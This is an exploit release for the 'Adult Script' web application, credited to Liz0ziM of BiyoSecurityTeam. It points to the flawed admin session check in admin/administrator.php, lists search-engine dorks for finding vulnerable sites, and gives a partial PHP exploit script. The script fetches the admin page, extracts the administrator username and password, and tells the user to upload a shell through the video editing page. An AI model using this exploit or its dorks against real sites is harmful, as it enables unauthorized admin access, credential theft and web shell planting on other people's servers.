Adult Script Unauthorized Administrative Access Exploit
Exploit Coded By Liz0ziM From BiyoSecurityTeam
Greetz My all friend and BiyoSecurityTeam User..
Software site: http://www.adultscript.net/
Demo: http://www.adultscript.net/demo/
Vulnerable code in admin/administrator.php near lines 5-8
( ($_SESSION['adminid']=="") && ($_SESSION['admintype'] !=1))
{
header("Location: logout.php"); // Bypass Me :D
}
Dork:
inurl:submit-user-link.html
inurl:video-listing-cat
inurl:hosted-videos
inurl:porn-listing-cat
"Powered By AdultScript.NET"
"Copyright 2007 [IAG].AdultScript.v1.5.Nulled"
";
sleep(1);
echo 'Sending Evil Code.......
';
$kaynak=dosya_indir($adres."/admin/administrator.php");
sleep(5);
if(eregi('value="',$kaynak)) {
echo "Exploit Has Been Succeful
";
preg_match_all($desen,$kaynak,$sonuc);
echo "".$adres."/admin/
";
echo "Username :".htmlspecialchars($sonuc[1][0])."
";
echo "Password:".htmlspecialchars($sonuc[1][1])."
";
echo $adres."/admin/videolinks_view.php edit video and upload shell :)";
}
else
{
echo "Exploit Has Been Failed!
";
}
}
?>